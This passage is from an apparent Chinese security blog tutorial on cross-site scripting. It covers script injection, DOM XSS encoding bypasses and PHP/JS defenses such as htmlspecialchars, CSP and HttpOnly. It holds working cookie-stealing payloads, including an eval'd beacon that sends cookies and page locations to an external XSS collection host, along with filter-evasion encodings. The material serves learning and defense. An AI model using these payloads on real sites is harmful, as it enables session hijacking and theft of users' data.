<h2 id="插入-js-代码"><a href="#插入-js-代码" class="headerlink" title="插入 js 代码"></a>插入 js 代码</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">说了那么多，大家可能都以为 xss 就是弹窗，其实错了，弹窗只是测试 xss 的存在性和使用性。</span><br><span class="line">这时我们要插入 js 代码了，怎么插呢？</span><br><span class="line">	你可以这样</span><br><span class="line">&lt;script src=<span class="string">"js_url"</span>&gt;<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span> </span><br><span class="line">	也可以这样</span><br><span class="line">&lt;img src=x onerror=appendChild(createElement(<span class="string">'script'</span>)).src=<span class="string">'js_url'</span> /&gt; </span><br><span class="line">    各种姿势，各种插，只要鞥运行我们的 js 就 OK。那运行我们的 js 有什么用呢？Js 可 以 干 很 多 的 事， 可 以 获 取 cookies( 对http-only 没用 )、控制用户的动作 ( 发帖、私信什么的 ) 等等。</span><br></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">加载外部 js&lt;script src=<span class="string">"http://127.0.0.1/xss.js"</span>&gt;</span><br><span class="line">&lt;script&gt;<span class="built_in">document</span>.location=<span class="string">'http://127.0.0.1/cookie.php?cookis='</span>+<span class="built_in">document</span>.cookie;<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line">&lt;svg&gt;<span class="xml"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://xss.buuoj.cn/LicptZ"</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br><span class="line">&lt;svg&gt;<span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">eval</span>(<span class="string">"(function()&#123;(new Image()).src='http://xss.buuoj.cn/index.php?do=api&amp;id=yxxaiH&amp;location='+escape((function()&#123;try&#123;return document.location.href&#125;catch(e)&#123;return ''&#125;&#125;)())+'&amp;toplocation='+escape((function()&#123;try&#123;return top.location.href&#125;catch(e)&#123;return ''&#125;&#125;)())+'&amp;cookie='+escape((function()&#123;try&#123;return document.cookie&#125;catch(e)&#123;return ''&#125;&#125;)())+'&amp;opener='+escape((function()&#123;try&#123;return (window.opener &amp;&amp; window.opener.location.href)?window.opener.location.href:''&#125;catch(e)&#123;return ''&#125;&#125;)());&#125;)();</span></span></span></span><br><span class="line"><span class="xml">if(''==1)&#123;keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&amp;id=yxxaiH&amp;url='+escape(document.location)+'&amp;cookie='+escape(document.cookie)&#125;;")<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<p><img src="/2019/11/16/2%20XSS/image-20200726161933891.png" alt="image-20200726161933891"></p>
<p><img src="/2019/11/16/2%20XSS/image-20200726162032453.png" alt="image-20200726162032453"></p>
<h1 id="dom-xss"><a href="#dom-xss" class="headerlink" title="dom xss"></a>dom xss</h1><p>由于在 documnet.wirte<br>&lt;&gt;，”，也转义了&amp;,过滤了\让我们不能构造html实体，和unicode编码<br>\是过滤了，不是转义了阿！我们试试输入两个\，发现只过滤了一个<br>&lt;&gt;<br>\u003c \u003e<br>换成16进制编码\x3cscript\x3ealert(document.domain);\x3c/script\x3e<br>换成Unicode编码\u003cscript\u003ealert(document.domain);\u003c/script\u003e<br>八进制编码\74img src=x οnerrοr=alert(document.domain)\76</p>
<p>思路类似于宽字节注入，利用特殊字节吃掉双引号<br>半角片假名使用两个字节来表示：0x8E + 0xA1-0xDF<br>JIS X 0208字元使用两个字节来表示：0xA1-0xFE + 0xA1-0xFE<br>JIS X 0212字元使用三个字节来表示：0x8F + 0xA1-0xFE + 0xA1-0xFE<br>p1=1%A7&amp;p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7</p>
<h1 id="思维导图"><a href="#思维导图" class="headerlink" title="思维导图"></a>思维导图</h1><p><img src="/2019/11/16/2%20XSS/XSS%E8%84%91%E5%9B%BE.png" alt="XSS脑图"></p>
<h1 id="XSS漏洞防范"><a href="#XSS漏洞防范" class="headerlink" title="XSS漏洞防范"></a>XSS漏洞防范</h1><h2 id="1-PHP直接输出html的，可以采用以下的方法进行过滤："><a href="#1-PHP直接输出html的，可以采用以下的方法进行过滤：" class="headerlink" title="1.PHP直接输出html的，可以采用以下的方法进行过滤："></a>1.PHP直接输出html的，可以采用以下的方法进行过滤：</h2><ul>
<li>htmlspecialchars函数</li>
<li>htmlentities函数</li>
<li>HTMLPurifier.auto.php插件</li>
<li>RemoveXss函数</li>
</ul>
<h2 id="2-PHP输出到JS代码中，或者开发Json-API的，则需要前端在JS中进行过滤："><a href="#2-PHP输出到JS代码中，或者开发Json-API的，则需要前端在JS中进行过滤：" class="headerlink" title="2.PHP输出到JS代码中，或者开发Json API的，则需要前端在JS中进行过滤："></a>2.PHP输出到JS代码中，或者开发Json API的，则需要前端在JS中进行过滤：</h2><ul>
<li>尽量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()来输出文本内容</li>
<li>必须要用innerHTML等等函数，则需要做类似php的htmlspecialchars的过滤</li>
</ul>
<h2 id="3-其它的通用的补充性防御手段"><a href="#3-其它的通用的补充性防御手段" class="headerlink" title="3.其它的通用的补充性防御手段"></a>3.其它的通用的补充性防御手段</h2><ul>
<li><p>在输出html时，加上Content Security Policy的Http Header    </p>
<p>（作用：可以防止页面被XSS攻击时，嵌入第三方的脚本文件等）    </p>
<p>（缺陷：IE或低版本的浏览器可能不支持）</p>
</li>
<li><p>在设置Cookie时，加上HttpOnly参数    </p>
<p>（作用：可以防止页面被XSS攻击时，Cookie信息被盗取，可兼容至IE6）    </p>
<p>（缺陷：网站本身的JS代码也无法操作Cookie，而且作用有限，只能保证Cookie的安全）</p>
</li>
<li><p>在开发API时，检验请求的Referer参数    </p>
<p>（作用：可以在一定程度上防止CSRF攻击）    </p>
<p>（缺陷：IE或低版本的浏览器中，Referer参数可以被伪造）</p>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/11/16/%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BA%E5%AF%86%E7%A0%81%E5%AD%A6-%E5%B8%B8%E7%94%A8%E5%8A%A0%E5%AF%86%E6%8A%80%E6%9C%AF%E5%8E%9F%E7%90%86%E4%B8%8E%E5%BA%94%E7%94%A8/" rel="next" title="深入浅出密码学--常用加密技术原理与应用">
                  <i class="fa fa-chevron-left"></i> 深入浅出密码学--常用加密技术原理与应用
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/11/20/rsa-sage-Coppersmith-%E5%AE%9A%E7%90%86%E6%94%BB%E5%87%BB/" rel="prev" title="rsa sage  Coppersmith 定理攻击">
                  rsa sage  Coppersmith 定理攻击 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#反射型XSS-注入后在当前返回的页面中含有xss代码"><span class="nav-number">1.</span> <span class="nav-text">反射型XSS  注入后在当前返回的页面中含有xss代码</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#最简单-lt-script-gt"><span class="nav-number">1.1.</span> <span class="nav-text">最简单&lt;script&gt;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用其他标签弹窗"><span class="nav-number">1.2.</span> <span class="nav-text">使用其他标签弹窗</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#闭合-添加标签内属性-使用鼠标事件on"><span class="nav-number">1.3.</span> <span class="nav-text">闭合 添加标签内属性    使用鼠标事件on~</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#闭合-直接闭合标签"><span class="nav-number">1.4.</span> <span class="nav-text">闭合  直接闭合标签</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php代码绕过"><span class="nav-number">1.5.</span> <span class="nav-text">php代码绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#过滤了-lt-script-gt-标签-大小写绕过和双写绕过"><span class="nav-number">1.5.0.1.</span> <span class="nav-text">过滤了 &lt;script&gt; 标签  大小写绕过和双写绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#过滤了-lt-和-gt-，替换成-amp-lt-amp-gt-或空格-用on-鼠标事件"><span class="nav-number">1.5.0.2.</span> <span class="nav-text">过滤了&lt;和&gt;，替换成&amp;lt;&amp;gt;或空格 用on~鼠标事件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#同时过滤script-标签和on-用-lt-a-href"><span class="nav-number">1.5.0.3.</span> <span class="nav-text">同时过滤script 标签和on  用&lt;a href</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#无法大小写绕过和双写绕过-使用编码绕过-html实体编码"><span class="nav-number">1.5.0.4.</span> <span class="nav-text">无法大小写绕过和双写绕过  使用编码绕过  html实体编码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#替换了空格-script-使用-0a换行符绕过-0a-0b-0c-0d-回车换行-空格绕过"><span class="nav-number">1.5.0.5.</span> <span class="nav-text">替换了空格 script &#x2F;  使用%0a换行符绕过 %0a %0b %0c %0d (回车换行) 空格绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#过滤了-和"><span class="nav-number">1.5.0.6.</span> <span class="nav-text">过滤了&#x3D;和(</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#alert-被过滤"><span class="nav-number">1.5.0.7.</span> <span class="nav-text">alert 被过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#iframe"><span class="nav-number">1.5.0.8.</span> <span class="nav-text">iframe</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#UTF-7-XSS-【internet-Explorer】"><span class="nav-number">1.5.0.9.</span> <span class="nav-text">UTF-7 XSS  【internet Explorer】</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#还没被过滤-【internet-Explorer】"><span class="nav-number">1.5.0.10.</span> <span class="nav-text">&#96;&#96;还没被过滤 &#96;【internet Explorer】</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#style-XSS【internet-Explorer】"><span class="nav-number">1.5.0.11.</span> <span class="nav-text">style XSS【internet Explorer】</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其他编码"><span class="nav-number">1.5.0.12.</span> <span class="nav-text">其他编码</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#URL-编码"><span class="nav-number">1.5.0.12.1.</span> <span class="nav-text">URL 编码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#unicode-编码"><span class="nav-number">1.5.0.12.2.</span> <span class="nav-text">unicode 编码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#CSS-编码"><span class="nav-number">1.5.0.12.3.</span> <span class="nav-text">CSS 编码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#JS编码：js提供了四种字符编码的策略，"><span class="nav-number">1.5.0.12.4.</span> <span class="nav-text">JS编码：js提供了四种字符编码的策略，</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#复合编码："><span class="nav-number">1.5.0.12.5.</span> <span class="nav-text">复合编码：</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS跨站脚本攻击汇总"><span class="nav-number">1.6.</span> <span class="nav-text">XSS跨站脚本攻击汇总</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#插入-js-代码"><span class="nav-number">1.7.</span> <span class="nav-text">插入 js 代码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#dom-xss"><span class="nav-number">2.</span> <span class="nav-text">dom xss</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#思维导图"><span class="nav-number">3.</span> <span class="nav-text">思维导图</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS漏洞防范"><span class="nav-number">4.</span> <span class="nav-text">XSS漏洞防范</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-PHP直接输出html的，可以采用以下的方法进行过滤："><span class="nav-number">4.1.</span> <span class="nav-text">1.PHP直接输出html的，可以采用以下的方法进行过滤：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-PHP输出到JS代码中，或者开发Json-API的，则需要前端在JS中进行过滤："><span class="nav-number">4.2.</span> <span class="nav-text">2.PHP输出到JS代码中，或者开发Json API的，则需要前端在JS中进行过滤：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-其它的通用的补充性防御手段"><span class="nav-number">4.3.</span> <span class="nav-text">3.其它的通用的补充性防御手段</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">zhiliya</p>
  <div class="site-description" itemprop="description">emmmm 感觉没啥好说的</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhiliya</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.5.0
  </div>

        












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  
















  

  

</body>
</html>
